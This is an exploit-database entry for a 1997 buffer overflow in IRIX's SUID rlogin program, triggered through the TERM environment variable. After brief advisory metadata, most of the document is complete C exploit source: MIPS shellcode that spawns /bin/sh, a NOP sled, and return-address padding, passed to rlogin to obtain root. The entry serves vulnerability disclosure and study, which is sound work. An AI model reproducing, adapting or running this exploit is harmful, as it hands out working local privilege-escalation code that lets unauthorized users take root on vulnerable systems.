Buffer Overflow in SUID rlogin Program

vendor:

IRIX

by:

LAST STAGE OF DELIRIUM

7.2

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: IRIX

Affected Version From: IRIX 5.2, 5.3, 6.2, 6.3

Affected Version To: IP:17, 19, 20, 21, 22, 32

Patch Exists: YES

Related CWE: N/A

CPE: a:sgi:irix

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

1997

Buffer Overflow in SUID rlogin Program

A buffer overflow condition has been found in the rlogin program that may allow an unauthorized user to gain root access. The overflow in particular is in the rlogin code that handles the TERM enviroment variable. Similar bugs have been known to exist in some telnetd implementations.

Mitigation:

Upgrade to the latest version of rlogin program.

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/242/info

The SUID rlogin program is used to establish remote sessions. A buffer overflow condition has been found in the rlogin program that may allow an unauthorized user to gain root access. The overflow in particular is in the rlogin code that handles the TERM enviroment variable. Similar bugs have been known to exist in some telnetd implementations.

NOTE:

The vulnerability was updated august 2, 2000 to reflect certain versions of IRIX to be vulnerable.
*/

/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland        *://lsd-pl.net/ #*/
/*## /usr/bsd/rlogin                                                         #*/

#define NOPNUM 4940
#define ADRNUM 5000 
#define ALLIGN 2

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland  //lsd-pl.net/\n");
    printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n");

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10288+7000;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"TERM=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; 
    *b=0;

    execle("/usr/bsd/rlogin","rlogin","localhost",0,envp);
}